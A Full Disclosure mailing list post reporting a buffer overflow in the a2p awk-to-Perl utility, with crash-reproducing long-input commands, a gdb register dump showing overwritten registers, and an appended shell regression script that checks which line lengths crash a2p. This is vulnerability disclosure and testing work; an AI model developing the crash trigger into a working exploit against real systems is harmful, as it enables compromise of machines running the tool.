Message-ID: <20141227225837.95192tx6x3js4eqs@webmail.alunos.dcc.fc.up.pt>
Date: Sat, 27 Dec 2014 22:58:37 +0100
From: up201407890@...nos.dcc.fc.up.pt
To: fulldisclosure@...lists.org
Subject: [FD] /usr/bin/a2p buffer overflow

$ echo @alunos.dcc.fc.up|sed 's/^/up201407890/g;s/$/.pt/g'

I have found what appears to be a buffer overflow in the a2p (awk2perl) utility.
It comes by default on several different systems.
Tested on Fedora 20, Fedora 19, Debian, and probably works on every other UNIX-like.

E.g.:

[saken@...py ~]$ python -c "print 'A' * 2048" | a2p >/dev/null
[saken@...py ~]$ python -c "print 'A' * 2049" | a2p >/dev/null
[saken@...py ~]$ python -c "print 'A' * 2050" | a2p >/dev/null
Segmentation fault

or

[saken@...py ~]$ python -c "print 'A'*3000" > lel
[saken@...py ~]$ gdb a2p
(gdb) r lel
Starting program: /usr/bin/a2p lel
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x000000000040b7c5 in yyparse ()
(gdb) info reg
rax            0x4141414141414141   8680820740569200760
rbx            0x1                  1
rcx            0x0                  0
rdx            0x67d724             6805284
rsi            0x67dab0             6806192
rdi            0x41414141           2021161080
rbp            0x6                  0x6
rsp            0x7fffffffe1d0       0x7fffffffe1d0
r8             0x8                  8
r9             0x5f                 95
r10            0x0                  0
r11            0x38e0174b60         244277791584
r12            0x6                  6
r13            0x0                  0
r14            0x0                  0
r15            0x0                  0
rip            0x40b7c5             0x40b7c5 <yyparse+757>
eflags         0x10206              [ PF IF RF ]
cs             0x33                 51
ss             0x2b                 43
ds             0x0                  0
es             0x0                  0
fs             0x0                  0
gs             0x0                  0

('^@+@...'-!@%.')

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
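
A regression check built from the reproduction in the message above, for confirming that an installed or rebuilt a2p no longer dies on long input lines. This is an added example, not part of the original post; the function names are hypothetical, the line lengths are the ones the post uses, and treating an exit status above 128 as death by signal is an assumption about the calling shell.

```shell
#!/bin/sh
# Added example: regression check for the crash reported above.
# Line lengths are the ones used in the post; all names here are hypothetical.

LENGTHS="2048 2049 2050 3000"

# gen_line N: print N 'A' bytes plus a newline, like python's print 'A' * N.
gen_line() {
    head -c "$1" /dev/zero | tr '\0' 'A'
    echo
}

# died_by_signal N CMD...: true if CMD, fed an N-byte line on stdin,
# ended with a status above 128 (how the shell reports death by signal).
died_by_signal() {
    _n=$1
    shift
    gen_line "$_n" | "$@" >/dev/null 2>&1
    [ "$?" -gt 128 ]
}

# crashing_lengths CMD...: echo the lengths from LENGTHS that kill CMD.
crashing_lengths() {
    _hits=""
    for _len in $LENGTHS; do
        if died_by_signal "$_len" "$@"; then
            _hits="${_hits:+$_hits }$_len"
        fi
    done
    echo "$_hits"
}

# Run against the installed a2p, if any; a fixed build should report nothing.
if command -v a2p >/dev/null 2>&1; then
    hits=$(crashing_lengths a2p)
    if [ -n "$hits" ]; then
        echo "a2p killed by a signal at line lengths: $hits"
    else
        echo "a2p survived all test lines"
    fi
fi
```

Any other stdin filter can be passed to crashing_lengths in place of a2p, which makes the same check usable in a package test suite.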